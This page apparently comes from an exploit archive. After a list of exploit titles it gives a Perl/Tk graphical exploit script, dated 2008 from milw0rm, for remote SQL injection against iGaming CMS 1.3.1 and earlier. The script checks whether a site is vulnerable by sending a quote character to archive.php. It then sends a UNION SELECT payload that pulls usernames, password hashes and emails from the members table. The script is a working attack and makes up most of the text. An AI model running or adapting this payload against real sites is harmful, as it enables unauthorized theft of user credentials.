
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
88 lines
3.6 KiB
Perl
Executable file
88 lines
3.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
use Tk;
|
|
use Tk::BrowseEntry;
|
|
use Tk::DialogBox;
|
|
use LWP::UserAgent;
|
|
|
|
$mw = new MainWindow(title => "UnderWHAT?!" );
|
|
|
|
$mw->geometry ( '395x180' ) ;
|
|
$mw->resizable(0,0);
|
|
|
|
$mw->Label(-text => '', -font => '{Verdana} 2',-foreground=>'red')->pack();
|
|
$mw->Label(-text => 'iGaming cms <= 1.3.1 Remote Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
|
|
$mw->Label(-text => 'found by gemaglabin [ mafia of antichat ]', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
|
|
$mw->Label(-text => '', -font => '{Tahoma} 2 bold',-foreground=>'red')->pack();
|
|
|
|
|
|
$fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
|
|
$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
|
|
|
|
$url = 'http://test2.ru/igaming/';
|
|
$user_id = '1';
|
|
$prefix = 'sp_';
|
|
$table = 'users';
|
|
$report = '';
|
|
|
|
|
|
|
|
$fleft->Label ( -text => 'Path to site index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
|
|
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
|
|
|
|
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
|
|
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
|
|
|
|
$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
|
|
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$hash) ->pack ( -side => "top" , -anchor => 'w' ) ;
|
|
|
|
$fright->Label( -text => ' ')->pack();
|
|
$fleft->Label( -text => ' ')->pack();
|
|
|
|
$fleft->Label ( -text => "Test site vulnerability", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
|
|
$fright->Button(-text => "Test site vulnerability",
|
|
-relief => "groove",
|
|
-width => '30',
|
|
-font => '{Verdana} 8 bold',
|
|
-activeforeground => 'red',
|
|
-command => \&test_vuln
|
|
)->pack();
|
|
|
|
|
|
$fleft->Label ( -text => "Get all possible data ", -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
|
|
$fright->Button(-text => 'Get data from database',
|
|
-relief => "groove",
|
|
-width => '30',
|
|
-font => '{Verdana} 8 bold',
|
|
-activeforeground => 'red',
|
|
-command => \&get_hash
|
|
)->pack();
|
|
|
|
|
|
MainLoop();
|
|
|
|
sub get_hash()
|
|
{
|
|
$xpl = LWP::UserAgent->new( ) or die;
|
|
$InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
|
|
$res = $xpl->post($url."archive.php",['section'=>'-1 union select 1,2,concat_ws(char(32),pseudo,pass,email,nom),4 from '.$prefix.'members where id='.$user_id.'/*']);
|
|
if($res->as_string =~ /Date Posted: (.*)</)
|
|
{
|
|
$hash = $1;
|
|
}
|
|
}
|
|
|
|
|
|
sub test_vuln()
|
|
{
|
|
$InfoWindow=$mw->DialogBox(-title => 'test site vulnerability', -buttons => ["OK"]);
|
|
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
|
|
$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
|
|
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
|
|
$xpl = LWP::UserAgent->new( ) or die;
|
|
$res = $xpl->post($url."archive.php",['section'=>"'"]);
|
|
if($res->as_string =~ /Fatal error/i ) { $hash='SITE VULNERABLE'}
|
|
else { $hash = 'SITE UNVULNERABLE'}
|
|
}
|
|
|
|
# milw0rm.com [2008-01-11]
|